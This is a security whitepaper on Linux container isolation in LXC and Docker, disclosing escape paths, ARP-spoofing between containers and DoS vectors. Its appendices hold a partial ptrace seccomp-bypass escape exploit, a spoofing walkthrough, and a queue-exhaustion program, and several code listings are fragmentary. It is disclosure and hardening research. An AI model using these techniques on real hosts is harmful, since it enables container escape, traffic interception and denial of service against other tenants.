Container Whitepaper
Prepared by:
Jesse Hertz
Namespaces
Many Linux namespace features were designed with the goal of making container systems
usable and secure [1] [2]. The kernel provides a number of namespaces [3] that form the core of
modern containerization systems:
IPC Provides namespaced versions of SystemV IPC and POSIX message queues.
While keeping these IPC mechanisms isolated is important to secure processes
that use them, overall they won’t be particularly security relevant for the
purposes of this paper. A later section discusses “Denial of Service Attacks”
against these systems.
Network Provides a namespaced and isolated network stack. The majority of container
use-cases involve networked services, so this will prove to be a core feature of
containers. The section “NET_RAW abuse” will explore exploiting typical flaws
in container networking.
Mount Provides a namespaced view of mount points. Combined with the pivot_root(2)
[4] syscall, this will be used to isolate the container’s filesystem from the host’s
filesystem. The section “The Issue With open_by_handle_at()” will go over a flaw
in this implementation, how it can be exploited, and how this exploitation is
prevented in modern container systems.
PID Provides a namespaced tree of process IDs (PIDs). This allows each container to
have a fully isolated process tree, in which it has an ‘init’ process that runs as PID
1 inside this namespace. Processes running in a container will have a different
PID on the host than they do inside the container’s PID namespace. A
vulnerability that impacts this namespace will be covered in “PID Namespacing
Info-Leak” later in this paper.
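As a rough illustration of how these namespaces surface to userland, the following Python sketch lists the namespaces a process belongs to by reading the symlinks under /proc/<pid>/ns. The helper name `list_namespaces` is hypothetical, and the sketch assumes a Linux host with /proc mounted. Two processes that share a namespace will report the same identifier for it.

```python
import os


def list_namespaces(pid="self"):
    """Return {namespace_name: identifier} for a process, read from /proc/<pid>/ns."""
    ns_dir = "/proc/{}/ns".format(pid)
    result = {}
    try:
        names = os.listdir(ns_dir)
    except OSError:
        # /proc is not mounted, or the process is not visible from here
        return result
    for name in sorted(names):
        try:
            # Each entry is a symlink whose target looks like "pid:[4026531836]"
            result[name] = os.readlink(os.path.join(ns_dir, name))
        except OSError:
            continue
    return result
```

Comparing the output for PID 1 on the host with the output inside a container is a quick way to see which namespaces the container actually has to itself.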
Cgroups Cgroups [9] (short for control groups) provide a hierarchical interface for
managing and metering resources and device access. Cgroups can be used by
higher privileged processes to put limits on lower privileged processes’
memory usage, CPU usage, and block device IO. They can also be used in
conjunction with iptables in order to provide traffic shaping. Most importantly,
they are used in container systems to control access to devices [10] [11] [12].
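To see which cgroups a process has been placed in, /proc/<pid>/cgroup can be parsed. The sketch below is a minimal parser for that file, assuming the documented `hierarchy-ID:controller-list:path` line format. The function name and the sample paths in the usage note are illustrative only.

```python
def parse_cgroup_file(text):
    """Parse /proc/<pid>/cgroup content into (hierarchy_id, controllers, path) tuples."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # Split at most twice: the cgroup path itself may contain ':'
        hierarchy_id, controllers, path = line.split(":", 2)
        controller_list = controllers.split(",") if controllers else []
        entries.append((int(hierarchy_id), controller_list, path))
    return entries
```

For example, a (hypothetical) line such as `3:cpu,cpuacct:/lxc/a` would be returned as `(3, ["cpu", "cpuacct"], "/lxc/a")`.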
Capabilities Linux capabilities [13] were introduced as a way to break the role of root down
into discrete subsections, which could be granted to non-root processes to
allow them to perform privileged actions. A process has a concept of a
“bounding set” of capabilities, which acts as a limiting superset for the
capabilities it can have. Importantly, and by default, this bounding set is carried
over to any child process, so the “init” process of the container creates a limiting
set of capabilities for all processes inside the container (as all processes
descend from PID 1). It is worth noting that, by default, Docker drops many
more capabilities [12] than LXC does [14] for privileged containers.
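The bounding set of a process is exposed as a hexadecimal bitmask in the `CapBnd:` line of /proc/<pid>/status. The following sketch decodes such a mask into capability names, which makes it easy to compare what different container runtimes leave enabled. The helper names are hypothetical, and the name table follows the bit numbering in capabilities(7) up to CAP_AUDIT_READ; bits beyond that are ignored here.

```python
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
]


def decode_caps(mask):
    """Translate a capability bitmask into a list of capability names."""
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


def bounding_set(status_text):
    """Extract and decode the CapBnd line from /proc/<pid>/status content."""
    for line in status_text.splitlines():
        if line.startswith("CapBnd:"):
            return decode_caps(int(line.split()[1], 16))
    return None  # no CapBnd line found
```

Running `bounding_set(open("/proc/1/status").read())` inside a container shows the limiting set established for its init process.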
MAC Linux Security Modules (LSMs) [15] provide security hooks for Mandatory Access
Control (MAC) systems. AppArmor [16] is the most prevalent LSM in container
systems, and is the system this paper will discuss. AppArmor profiles can greatly
limit the actions that a given program can take, as well as take complex actions
on process-start (such as performing pivot_root()’s, and otherwise manipulating
the mount namespace). Both LXC and Docker ship, and enable by default,
profiles to establish essential security barriers and defense in depth (particularly
for privileged containers). Vulnerabilities that would be possible without
AppArmor (or with a weak profile) will be explored in the section “The
Importance of AppArmor”.
Seccomp Seccomp [19] is a mechanism for system call filtering. Seccomp policies come in
two versions. In version one, also referred to as “Strict” mode, a filter is a small, fixed set of
allowed system calls which cannot be customized. In version
two, “Filter mode”, system call filters are written as Berkeley Packet
Filter (BPF) programs. This allows more finely-grained policies to be set on
system call usage (with some caveats: seccomp-bpf filters can inspect syscall
arguments, but cannot dereference pointers [19]).
LXC currently uses a relatively simple policy [20], while the 1.10 release of
Docker has introduced support for seccomp-bpf, as well as providing a fairly
comprehensive example filter [21]. Note that on Docker 1.10, seccomp is not
used by default on trusty (somewhat confusingly, when using Docker 1.10 on
Ubuntu 15.10, seccomp is used by default). However, as of Docker 1.11.1,
seccomp is now used by default on trusty as well.
The section “The ptrace(2) Hole” will discuss bypassing seccomp.
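Because the seccomp defaults differ between releases and distributions, it can be useful to check which mode a process is actually running under. On kernels that report it (Linux 3.8 and later), /proc/<pid>/status contains a `Seccomp:` field, where 0 means disabled, 1 means strict mode, and 2 means filter mode. The sketch below reads that field; the function name is hypothetical.

```python
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode(status_text):
    """Return the seccomp mode named in /proc/<pid>/status content, or None if absent."""
    for line in status_text.splitlines():
        if line.startswith("Seccomp:"):
            return SECCOMP_MODES.get(int(line.split()[1]), "unknown")
    return None  # field not present (older kernels do not report it)
```

Calling `seccomp_mode(open("/proc/self/status").read())` from inside a container gives a quick indication of whether a seccomp-bpf filter has been applied.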
By examining segments of the AppArmor policy in use by LXC, several “historical” (or theoretical)
container breakouts can be understood, providing insight into the need for AppArmor (for the full
policies, see [22] for LXC, and [23] for Docker).
Docker blocks many of these attacks by mounting /sys and parts of /proc as read-only filesystems,
rather than (or in addition to) using AppArmor. Note that with the addition of user namespaces,
some of these policies have become defense-in-depth measures, as kernel namespaces should
prevent the actions without the presence of AppArmor (as long as the container has limited
capabilities in the root user namespace).
Mount Options
First up are the AppArmor policies to block access to mounting devpts filesystems. As the
comment below states, without this the container could remount /dev/pts and get access to the
host’s terminals.
Next are policies to stop the container from attempting to remount the root filesystem. This is
mainly done as a defense-in-depth measure.
Utility Changes
There are a number of dangerous places in /proc and /sys that allow trivial container escapes. All
of the following involve changing the location of a utility (such as modprobe) that the host will call
when certain events happen (such as a kernel module load request). By changing this to point to a
program within our container, an attacker can then cause the host to run an arbitrary piece of
code outside the container.
LXC uses the following ruleset to block these attacks. Note that this is not an AppArmor profile; it is the
input to a small Python script [24] which generates a long portion of AppArmor rules. The full
profile generated by this is at [25].
block /sys
allow /sys/fs/cgroup/**
allow /sys/devices/virtual/net/**
allow /sys/class/net/**
block /proc/sys
allow /proc/sys/kernel/shm*
allow /proc/sys/kernel/sem*
allow /proc/sys/kernel/msg*
allow /proc/sys/kernel/hostname
allow /proc/sys/kernel/domainname
allow /proc/sys/net/**
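The intent of the ruleset above can be modeled in a few lines: everything under a blocked prefix is covered unless it matches one of the allow patterns. The sketch below is only a model of that intent, using Python's `fnmatch` globbing as a stand-in for AppArmor's glob semantics; it is not the generator script [24], and `is_covered` is a hypothetical name.

```python
from fnmatch import fnmatchcase

BLOCKED = ["/sys", "/proc/sys"]
ALLOWED = [
    "/sys/fs/cgroup/**",
    "/sys/devices/virtual/net/**",
    "/sys/class/net/**",
    "/proc/sys/kernel/shm*",
    "/proc/sys/kernel/sem*",
    "/proc/sys/kernel/msg*",
    "/proc/sys/kernel/hostname",
    "/proc/sys/kernel/domainname",
    "/proc/sys/net/**",
]


def is_covered(path):
    """True if path sits under a blocked prefix and matches no allow pattern."""
    under_block = any(path == b or path.startswith(b + "/") for b in BLOCKED)
    if not under_block:
        return False
    return not any(fnmatchcase(path, pattern) for pattern in ALLOWED)
```

Under this model, /proc/sys/kernel/modprobe and /sys/kernel/uevent_helper are covered by the block rules, while /proc/sys/kernel/hostname and anything below /sys/fs/cgroup are not.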
• uevent_helper: uevents are events triggered by the kernel when a device is added or
removed [26]. Notably, the path for the “uevent_helper” can be modified by writing to
“/sys/kernel/uevent_helper”. Then, when a uevent is triggered (which can also be done from
userland by writing to files such as “/sys/class/mem/null/uevent”), the malicious uevent_helper
gets executed. A nice write-up with example code is available online [27].
• modprobe: modprobe [28] is a userland utility invoked when the kernel needs to load a
kernel module. Its location can be changed by modifying “/proc/sys/kernel/modprobe” [29],
and then code execution can be gained by performing any action which will trigger the kernel
to attempt to load a kernel module (such as using the crypto-API to load a currently unloaded
crypto-module, or using ifconfig to load a networking module for a device not currently used).
• core_pattern: core_patterns are usually used to tell the kernel how to name and format the
core dumps that are produced when a program crashes. However, they contain a terrific
feature [30]: “Since kernel 2.6.19, Linux supports an alternate syntax for the
/proc/sys/kernel/core_pattern file. If the first character of this file is a pipe symbol (|), then the
remainder of the line is interpreted as a program to be executed. Instead of being written to a
disk file, the core dump is given as standard input to the program.” Using this, a core_pattern
can be specified that invokes a program of our choice, and then to trigger its usage, you only
need to have a program crash.
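From a defensive point of view, the pipe syntax described in the core_pattern item is easy to detect. The following sketch, with a hypothetical function name, returns the program that the kernel would execute for a given core_pattern value, or None if the value is an ordinary file name template.

```python
def core_pattern_handler(value):
    """Return the program a core_pattern value pipes to, or None if it names a file."""
    value = value.strip()
    if not value.startswith("|"):
        return None
    # Everything after the pipe is a command line; the first word is the program
    parts = value[1:].split()
    return parts[0] if parts else None
```

On a host, `core_pattern_handler(open("/proc/sys/kernel/core_pattern").read())` shows which helper, if any, receives core dumps; a path that resolves inside a container's filesystem would be a strong sign of tampering.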
Dangerous Paths
• kcore: kcore provides a full dump of the physical memory of the system in the core file format
[31]. It does not allow writing to said memory. Access to this allows a container to trivially read
all of host memory.
• kmem: /proc/kmem is an alternate interface for /dev/kmem [32] (direct access to which is
blocked by the cgroup device whitelist), which is a character device file representing kernel
virtual memory. It allows both reading and writing, allowing direct modification of kernel
memory.
• mem: /proc/mem is an alternate interface for /dev/mem [32] (direct access to which is
blocked by the cgroup device whitelist), which is a character device file representing physical
memory of the system. It allows both reading and writing, allowing modification of all memory.
(It requires slightly more finesse than kmem, as virtual addresses need to be resolved to
physical addresses first).
• sysrq-trigger: Writing to this special file allows sending System Request Key commands [33],
which allow a number of privileged actions, such as killing processes, listing all processes on
the system, or triggering host reboot [34].
The final important section blocks writes to several different places which could be dangerous:
• debugfs: debugfs provides a “no rules” interface by which the kernel (or kernel modules) can
create debugging interfaces accessible to userland [35]. It has had a number of security issues
in the past [36], and the “no rules” guidelines behind the filesystem have often clashed with
security constraints [37]. Inside an LXC container, it is mounted read-only.
• /sys/firmware/efi/efivars: efivars provides an interface to write to the NVRAM used for UEFI
boot arguments [38]. Modifying them can render the host machine unbootable (and has in
some recent systems [39]).
• /sys/kernel/security: Mounted here is the securityfs interface, which allows configuration of
Linux Security Modules [40]. Most relevant for our purposes, this allows configuration of
AppArmor policies [41], and so access to this may allow a container to disable its MAC system.
• /proc/sys/fs: From the Red Hat manpages [42]: “This directory contains an array of options
and information concerning various aspects of the file system, including quota, file handle,
inode, and dentry information.” Write access to this directory would allow various denial-of-
service attacks against the host.
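A quick way to review a container's exposure to the paths discussed in this section is to probe them from inside the container. The sketch below does this with `os.access`, which reflects permission bits and read-only mounts but may not reflect decisions made by a MAC system such as AppArmor, so a positive result should be treated as a lead to verify by hand rather than a confirmed finding. The path list is taken from the text above; the function name is hypothetical.

```python
import os

SENSITIVE_PATHS = [
    "/sys/kernel/uevent_helper",
    "/proc/sys/kernel/modprobe",
    "/proc/sys/kernel/core_pattern",
    "/proc/kcore",
    "/proc/kmem",
    "/proc/mem",
    "/proc/sysrq-trigger",
    "/sys/firmware/efi/efivars",
    "/sys/kernel/security",
    "/proc/sys/fs",
]


def audit(paths=SENSITIVE_PATHS, access=os.access):
    """Report apparent read/write access for each path (access is injectable for testing)."""
    report = {}
    for path in paths:
        report[path] = {
            "read": bool(access(path, os.R_OK)),
            "write": bool(access(path, os.W_OK)),
        }
    return report
```

Any entry that reports `write: True` inside a container deserves a closer look.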
2
blacklist
reject_force_umount # comment this to allow umount -f; not recommended
[all]
kexec_load errno 1
open_by_handle_at errno 1
init_module errno 1
finit_module errno 1
delete_module errno 1
The first piece of the LXC policy is intended as a defense in depth measure to stop containers
from forcibly unmounting pieces of their filesystem, which may have security consequences. The
more interesting section is the blacklisting of certain dangerous syscalls:
Kernel Manipulation
Several system calls which allow manipulating kernel modules are banned (init_module(2),
finit_module(2), and delete_module(2) ), as well as kexec_load(2), which allows replacing the
currently running kernel with a new kernel image. Note that there is some defense in depth
against exploiting these in privileged containers:
• init_module(2) [43], finit_module(2) [44] and delete_module(2) [45]: These all require the
SYS_MODULE capability, which is dropped by Docker and LXC in privileged containers.
• kexec_load(2) [46]: kexec_load(2) does not require SYS_MODULE. Instead, it requires
SYS_BOOT, which privileged LXC containers retain. In most situations, this isn’t exploitable
(without bypassing seccomp), however it is worth noting Linux 3.17 introduced a new kexec
variant: kexec_file_load(2) [46]. This call (meant for loading signed kernels) is not on the
seccomp blacklist for a privileged LXC container, and only requires SYS_BOOT. However,
privileged LXC containers have a number of other issues allowing reliable container escape
without needing to boot into a new kernel (since we can in fact bypass seccomp! For the
eager reader, feel free to head right to ‘The ptrace(2) Hole’ and ‘Appendix: Privileged LXC
Escape PoC’).
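The gap described above (kexec_file_load(2) missing from the blacklist) can be checked mechanically. The following sketch parses a policy in the format shown earlier and reports which syscalls it rejects. It is an illustrative parser written for this paper's example, not LXC's own policy loader, and the names are hypothetical.

```python
LXC_POLICY = """\
2
blacklist
reject_force_umount # comment this to allow umount -f; not recommended
[all]
kexec_load errno 1
open_by_handle_at errno 1
init_module errno 1
finit_module errno 1
delete_module errno 1
"""


def parse_blacklist(policy_text):
    """Return {syscall: errno} for every 'name errno N' rule after a [section] line."""
    blocked = {}
    in_rules = False
    for raw in policy_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        if line.startswith("["):
            in_rules = True
            continue
        if not in_rules:
            continue
        fields = line.split()
        if len(fields) == 3 and fields[1] == "errno":
            blocked[fields[0]] = int(fields[2])
    return blocked
```

With the policy above, `"kexec_load" in parse_blacklist(LXC_POLICY)` is true while `"kexec_file_load" in parse_blacklist(LXC_POLICY)` is false, matching the observation in the text.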
From within a container, it is possible to access the “control regions” of devices attached to the
host PCI bus by using the /proc/bus/pci/ interface. Access to this /proc/ interface requires the
SYS_RAWIO capability. Even if this path in /proc was blocked through AppArmor, a container
with SYS_RAWIO could still access this interface through the iopl(2)/ioperm(2) syscalls (and then
using inb(2), outb(2) and friends [52] [53] to access the IO ports). Note that Docker is not
vulnerable to this, since (aside from limited portions), /proc is typically mounted read-only, and
SYS_RAWIO is dropped. For proof of concept code using this to send raw AHCI commands to the
hard-disk, see Appendix: /proc/bus/pci .
In the response to this bug, the LXC team commented that they consider LXC privileged
containers inherently unsafe, as there is a known and “unfixable” hole in LXC’s privileged
containers, involving ptrace(2) to bypass seccomp (also a known seccomp limitation, as discussed
below).
The seccomp check will not be run again after the tracer is
notified. (This means that seccomp-based sandboxes MUST NOT
allow use of ptrace, even of other sandboxed processes, without
extreme care; ptracers can use this mechanism to escape.)
Despite LXC privileged containers being inherently unsafe, in this author’s opinion, finding
privileged container breakouts can be a fun exercise (and often they can make privileged
containers slightly more safe: e.g. after reporting the /proc/bus/ issue, new AppArmor rules were
added and SYS_RAWIO was dropped by default). So to any interested readers, go forth and hunt!
I’d love to hear about what you find.
The following section covers some known weaknesses in unprivileged containers, along with
demonstrations on how they can be exploited. The following tests were performed on a default
Docker 1.10 setup [57] (which, on trusty, does not use user namespaces or seccomp by default),
as well as on a default LXC 1.0.8 setup [58] (which does use both user namespaces and seccomp
by default) on a default Vagrant Ubuntu Trusty64 VM. While Docker containers started this way
are not unprivileged, all the following attacks were found on an unprivileged LXC container, and
then verified to work in (default, privileged) Docker as well.
While the next two issues have been documented before by other researchers, they represent
subtly insecure defaults with large impacts, and so the author believes they merit further
discussion. On a positive note, in response to disclosing these issues to the LXC team, they will be
updating their security page to mention these issues [60], which should hopefully bring them to
the attention of more developers and administrators using LXC.
NET_RAW abuse
A common configuration for companies offering PaaS solutions built on containers is to have
multiple customers’ containers running on the same physical host. By default, both LXC and
Docker set up container networking so that all containers share the same Linux virtual bridge.
These containers will be able to communicate with each other. Even if this direct network access is
disabled (using the --icc=false flag for Docker, or using iptables rules for LXC), containers are not
restricted at the link layer. In particular, it is possible (and in fact quite easy) to conduct an ARP
spoofing attack on another container within the same host system, allowing full middle-person
attacks of the targeted container’s traffic. A full walkthrough of this attack is present in “Appendix:
Cross-Container ARP Spoofing Walkthrough”. The author reported this issue to both LXC and
Docker [61] [62]. As referenced in the responses to the bug report, this is not a particularly new
issue. It has been documented in both LXC [63] [64] [65] and Docker [66] [67] [68], as well as in
other products such as OpenSwitch [69], and in OpenStack Neutron, where it was previously an
issue [70] and then fixed [71]. The LXC team recommends a number of solutions [61], including:
• Using LXD with OpenStack to manage container networking
• Using libvirt to manage the MAC tables of bridges/containers
Forgoing ulimits, two other DoS conditions are often exploitable in container systems:
• Disk Space: Perhaps (aside from a fork bomb) the simplest DoS against container systems
is to fill up disk space. From testing, this worked on LXC and Docker. Unlike some of the
other DoS attacks presented here, which may often bring down the host or introduce
enough instability to make themselves difficult to clean up, this one offers the simplest
ability to create a DoS and then clean it up quickly. Combined with the PID Namespacing
Info-Leak, this could allow an attacker container to target other tenants on a shared host,
selectively creating DoS conditions only when certain other containers or processes were
running.
• Global File Descriptor Limits: The system maintains a limit on the maximum number of
file descriptors available overall (available at /proc/sys/fs/file-max, which as was discussed
earlier, containers cannot write to). If containers are not sharing a UID map, and have a
ulimit set on the number of file descriptors they can open, a container can still attempt to
DoS the host (and other containers) by opening the maximum number of FDs allowed as
each user in its user namespace, providing a greatly amplified ability to consume FDs.
This is generally a “last line” DoS, and would only be attempted if mitigations for other
(simpler) vectors are put in place.
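To put numbers on the file descriptor item, the host's current usage can be read from /proc/sys/fs/file-nr, which holds three values: allocated file handles, allocated but unused handles, and the system-wide maximum. The sketch below parses that file and also shows the amplification arithmetic described above. The function names are hypothetical, and the figures in the usage note (a per-user limit of 1024 and a user namespace of 65536 UIDs) are assumptions chosen for illustration, not measurements.

```python
def parse_file_nr(text):
    """Parse /proc/sys/fs/file-nr content into (allocated, unused, maximum)."""
    allocated, unused, maximum = (int(field) for field in text.split())
    return allocated, unused, maximum


def fd_pressure(text):
    """Fraction of the system-wide file handle limit currently in use."""
    allocated, unused, maximum = parse_file_nr(text)
    return (allocated - unused) / float(maximum)


def amplified_fd_budget(per_user_limit, user_count):
    """Upper bound on descriptors a container can request across all its users."""
    return per_user_limit * user_count
```

With the assumed figures, `amplified_fd_budget(1024, 65536)` is 67108864 descriptors, which would comfortably exceed a file-max value in the low millions.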
Acknowledgements
I’d like to thank Tim Newsham for the code in Appendix: Privileged LXC Escape PoC, Aaron
Adams for the code in Appendix: /proc/bus/pci, Aaron Grattafiori for his help with reviewing content,
Jeff Dileo for pointing out how to combine DoS and Infoleaks to cause great havoc, and Jake
Heath, Jack Leadford, Justin Engler, and Jeremiah Blatz for their (heroic) efforts in copyediting my
brain mush into a coherent paper.
Appendix Code
As many of the appendices contain long code segments, all code in the appendices has been
packaged in a separate tarball for the reader’s convenience, available here: XXX.
Further Reading
I highly recommend the following (in no particular order) for both understanding containers and
container security:
• http://www.slideshare.net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-filesystem-magic-linuxcon
• https://lwn.net/Articles/531114/
• http://www.haifux.org/lectures/299/netLec7.pdf
• https://www.stgraber.org/2013/12/20/lxc-1-0-blog-post-series/
• https://major.io/wp-content/uploads/2015/08/Securing-Linux-Containers-GCUX-Gold-Paper-Major-Hayden.pdf
• http://arxiv.org/pdf/1501.02967.pdf
• https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/2016/april/ncc_group_understanding_hardening_linux_containers-10pdf
[1] https://lwn.net/Articles/531114/.
[2] https://lwn.net/Articles/524952/.
[3] http://man7.org/linux/man-pages/man7/namespaces.7.html.
[4] https://deis.com/blog/2015/isolation-linux-containers.
[5] http://lwn.net/Articles/543273/.
[6] https://medium.com/@ewindisch/linux-user-namespaces-might-not-be-secure-enough-a-k-a-subverting-posix-capabilities-f1c4ae19cad#.tboeuds6z.
[7] https://linuxcontainers.org/lxc/security/.
[8] https://blog.docker.com/2016/02/docker-engine-1-10-security/.
[9] https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Resource_Management_Guide/ch01.html.
[10] http://www.slideshare.net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-filesystem-magic-linuxcon.
[11] https://github.com/lxc/lxc/blob/master/config/templates/common.conf.in#L21.
[12] https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md.
[13] http://man7.org/linux/man-pages/man7/capabilities.7.html.
[14] https://github.com/lxc/lxc/blob/master/config/templates/common.conf.in#L13.
[15] https://www.kernel.org/doc/Documentation/security/LSM.txt.
[16] https://wiki.ubuntu.com/AppArmor.
[17] http://man7.org/linux/man-pages/man5/lxc.container.conf.5.html.
[18] https://docs.docker.com/engine/security/security.
[19] https://www.kernel.org/doc/Documentation/prctl/seccomp_filter.txt.
[20] https://github.com/lxc/lxc/blob/master/config/templates/common.seccomp.
[21] https://github.com/jfrazelle/docker/blob/d34bbb66d5d5f2f07b8f0c1b63df5f058f20b436/daemon/execdriver/native/seccomp_default.go.
[22] https://github.com/lxc/lxc/blob/master/config/apparmor/abstractions/container-base.
[23] https://github.com/docker/docker/blob/master/profiles/apparmor/template.go.
[24] https://github.com/lxc/lxc/blob/master/config/apparmor/lxc-generate-aa-rules.py.
[25] https://github.com/lxc/lxc/blob/master/config/apparmor/container-rules.
[26] http://www.mpipks-dresden.mpg.de/~mueller/docs/suse10.1/suselinux-manual_en/manual/sec.udev.kernel.html.
[27] http://blog.bofh.it/debian/id_413.
[28] http://linux.die.net/man/8/modprobe.
[29] http://kaivanov.blogspot.com/2010/09/all-you-need-to-know-about-procsys.html.
[30] http://man7.org/linux/man-pages/man5/core.5.html.
The following code demonstrates how ptrace(2) can be used to bypass seccomp. This allows
using open_by_handle_at(2), which allows escaping from a privileged container. While this
technique can still be used to disable seccomp inside unprivileged LXC containers, a security
check in the open_by_handle_at(2) system call will fail, due to the use of the `capable()` macro [79],
which performs capability checks against the root user namespace [80]. This entire seccomp
bypass vector is blocked by Docker by disallowing ptrace(2) inside containers:
/*
* @author Tim Newsham
* use ptrace to bypass seccomp rule against open_by_handle_at
* and use open_by_handle_at to get a handle on the REAL root dir
* and then chroot to it. This escapes privileged lxc container.
* gcc -g -Wall secopenchroot.c -o secopenchroot
* ./secopenchroot /tmp "02 00 00 00 00 00 00 00"
*
* assuming that the real root has file handle "02 00 00 00 00 00 00 00"
*/
#include <stdio.h>
#include <stdlib.h>
#include <syscall.h>
#include <errno.h>
#include <sys/signal.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <linux/kexec.h>
#include <sys/user.h>
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#define _GNU_SOURCE
#define __USE_GNU
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
n = 0;
while(*p) {
fp->handle_type = 1;
n = getDat(dat, fp->f_handle);
if(n == -1) {
printf("bad data!\n");
exit(1);
}
fp->handle_bytes = n;
mfd = open(fn, 0);
if(mfd == -1) {
perror(fn);
exit(1);
}
if(argc != 3) {
printf("bad usage\n");
exit(1);
}
switch((pid = fork())) {
case -1: perror("fork"); exit(1);
/*
* note: we wont get a syscall-enter-stop for any
* seccomp filtered syscalls, just the syscall-exit-stop.
*/
if(regs.rax != -ENOSYS) /* not a syscall-enter-stop ! */
continue;
if(regs.orig_rax == SYS_getpid) {
regs.orig_rax = regs.rdi;
regs.rdi = regs.rsi;
regs.rsi = regs.rdx;
regs.rdx = regs.r10;
regs.r10 = regs.r8;
regs.r8 = regs.r9;
regs.r9 = 0;
printf("syscallX %llu, before tampering\n", regs.orig_rax); dumpregs(pid);
ptrace(PTRACE_SETREGS, pid, NULL, &regs);
printf("after tampering\n");dumpregs(pid);
}
//printf("before\n");dumpregs(pid);
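The core of the trick in the listing above is the register rewrite performed by the tracer: the traced process issues a harmless getpid, placing the syscall it really wants in the first argument and that syscall's arguments after it, and the tracer shifts everything down by one register at the syscall-enter-stop. The following Python model reproduces only that shift, as a sketch of the idea rather than a working exploit. The register names follow the x86-64 `user_regs_struct`, and the syscall numbers in the usage note (39 for getpid, 304 for open_by_handle_at) are the x86-64 values, used here for illustration.

```python
def shift_syscall_registers(regs):
    """Model of the tracer's rewrite: promote argument 1 to the syscall number
    and move every remaining argument down one slot."""
    new = dict(regs)
    new["orig_rax"] = regs["rdi"]  # real syscall number was smuggled in arg 1
    new["rdi"] = regs["rsi"]
    new["rsi"] = regs["rdx"]
    new["rdx"] = regs["r10"]
    new["r10"] = regs["r8"]
    new["r8"] = regs["r9"]
    new["r9"] = 0                  # nothing left to shift into the last slot
    return new
```

For example, a tracee calling `syscall(SYS_getpid, 304, mount_fd, handle, flags)` stops with `orig_rax == 39` and `rdi == 304`; after the rewrite the kernel sees `orig_rax == 304` with `mount_fd`, `handle`, and `flags` in the first three argument registers.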
The following was performed on a default LXC installation [58], and reported to LXC and Docker
with a full write-up and reproduction, which was made public by the LXC team [61]. This
reproduction is for an LXC system, but it can easily be adapted to a Docker system instead.
# from now on, all commands will have the full command prompt to make it clear
# where they are being run
# in this case, 10.0.3.159 is container B's eth0, and 10.0.3.246 is container A's eth0
# since the two containers are on the same subnet, it may appear that they can
# sniff each other's traffic. so . . .
# a quick demonstration that you cannot normally sniff traffic on the wire
# just by virtue of being on the same subnet:
# in container A
root@a:/# tcpdump -i any -vv -n dst host 10.0.3.159
# in container B
root@b:/# nc -lv 8888
# now, we will demonstrate the ability to sniff traffic with ARP spoofing
# in container A:
# install dsniff
apt-get update
apt-get install dsniff
# look at the ARP tables on the host and note that both 10.0.3.159 and 10.0.3.246
# both now point at the MAC address for container A:
root@vagrant-ubuntu-trusty-64:~# arp -a
? (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
? (10.0.3.159) at e6:ad:42:7a:f1:54 [ether] on lxcbr0
? (10.0.3.246) at e6:ad:42:7a:f1:54 [ether] on lxcbr0
# Finally, we can try to send some traffic from the host to container B,
# and sniff it from container A
# in B
root@b:/# nc -lv 8888
# in A:
root@a:/# apt-get install tcpdump
root@a:/# tcpdump -i any -vv -n dst host 10.0.3.159
# on the host
root@vagrant-ubuntu-trusty-64:~# nc 10.0.3.159 8888
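The tell-tale sign of the attack in the walkthrough is two IP addresses resolving to the same MAC address in the host's ARP table. A host-side monitor could flag this automatically; the sketch below parses `arp -a` output in the format shown above and reports any MAC address claimed by more than one IP. The function name and regular expression are the author's own illustration and assume that output format.

```python
import re
from collections import defaultdict

ARP_LINE = re.compile(r"\((?P<ip>[0-9.]+)\) at (?P<mac>[0-9a-fA-F:]{17}) ")


def shared_macs(arp_output):
    """Return {mac: [ips]} for every MAC address that appears with more than one IP."""
    by_mac = defaultdict(list)
    for line in arp_output.splitlines():
        match = ARP_LINE.search(line)
        if match:
            by_mac[match.group("mac").lower()].append(match.group("ip"))
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}
```

Fed the three ARP entries from the walkthrough, this returns a single entry mapping e6:ad:42:7a:f1:54 to both 10.0.3.159 and 10.0.3.246.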
It is built with `gcc mq.c -lrt`, and then run with `./a.out`. Run this program in one container until it
has used all available resources (which will lead it to exit with: `mq_open(): Too many open files`).
Then, inside a second container, run the same program, and observe that it immediately errors
out without successfully creating one message queue.
/* @author jhertz
* based off code found at:
* https://users.pja.edu.pl/~jms/qnx/help/watcom/clibref/mq_overview.html
*/
#include <fcntl.h> /* O_RDWR, O_CREAT */
#include <mqueue.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
int main(void) {
    mqd_t mqdes; // Message queue descriptor
    char biggest[8192]; // based on a ulimit -q of 819200
    int i;
    /* Keep creating queues until the message queue limit is hit. */
    for(i=0; ; i++) {
        sprintf(biggest, "/%d", i);
